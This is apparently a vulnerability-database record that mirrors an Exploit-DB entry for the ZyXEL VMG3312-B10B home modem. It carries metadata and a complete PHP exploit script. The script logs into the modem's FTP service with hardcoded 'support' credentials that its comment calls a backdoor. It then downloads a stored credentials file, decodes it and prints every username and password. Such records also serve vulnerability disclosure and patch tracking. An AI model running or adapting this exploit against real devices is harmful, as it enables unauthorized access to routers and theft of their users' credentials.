ID
VAR-E-201810-0176
EDB ID
45746
TITLE
ZyXEL VMG3312-B10B < 1.00(AAPP.7) - Credential Disclosure - Hardware dos Exploit
Trust: 0.6
DESCRIPTION
ZyXEL VMG3312-B10B < 1.00(AAPP.7) - Credential Disclosure.. dos exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | zyxel | model: | vmg3312-b10b 1.00 | scope: | lt | version: | - | Trust: 1.6 |
EXPLOIT
# Exploit Title: ZyXEL VMG3312-B10B - Leak Credentials < 1.00(AAPP.7)
# Date: 2018-10-28
# Exploit Author: numan türle @numanturle
# Vendor Homepage: https://www.zyxel.com/
# Software Link: ftp://ftp.zyxel.com.tr/ZyXEL_URUNLERI/MODEMLER/VDSL_MODEMLER/VMG3312-B10B/
# Firmware: 1.00(AAPP.0)D7
# Tested on: windows
# Fixed firmware: 1.00(AAPP.7)
<?php
$ftp_server = "192.168.1.1"; // modem ip address
$ftp_conn = ftp_connect($ftp_server) or die("ftp server close");
$login = ftp_login($ftp_conn, "support", "support"); // backdoor
$local_file = "crackme";
$server_file = "/var/csamu"; // base64_encode files
if (ftp_get($ftp_conn, $local_file, $server_file, FTP_BINARY)) {
$open = file($local_file);
foreach($open as $u_p){
$bomb = explode(" ",$u_p);
$user = $bomb[0];
$pass = base64_decode($bomb[1]);
if(!empty($pass)){
echo "{$user}:{$pass}<br>";
}else {
continue;
}
}
}else {
echo "pfff";
}
ftp_close($ftp_conn);
?>
Trust: 1.0
EXPLOIT LANGUAGE
php
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Credential Disclosure
Trust: 1.6
CREDITS
numan türle
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 45746 | Trust: 1.6 |
db: | EDBNET | id: | 100034 | Trust: 0.6 |
REFERENCES
url: | https://www.exploit-db.com/exploits/45746/ | Trust: 0.6 |
SOURCES
db: | EXPLOIT-DB | id: | 45746 |
db: | EDBNET | id: | 100034 |
LAST UPDATE DATE
2022-07-27T09:29:36.927000+00:00
SOURCES RELEASE DATE
db: | EXPLOIT-DB | id: | 45746 | date: | 2018-10-30T00:00:00 |
db: | EDBNET | id: | 100034 | date: | 2018-11-04T00:00:00 |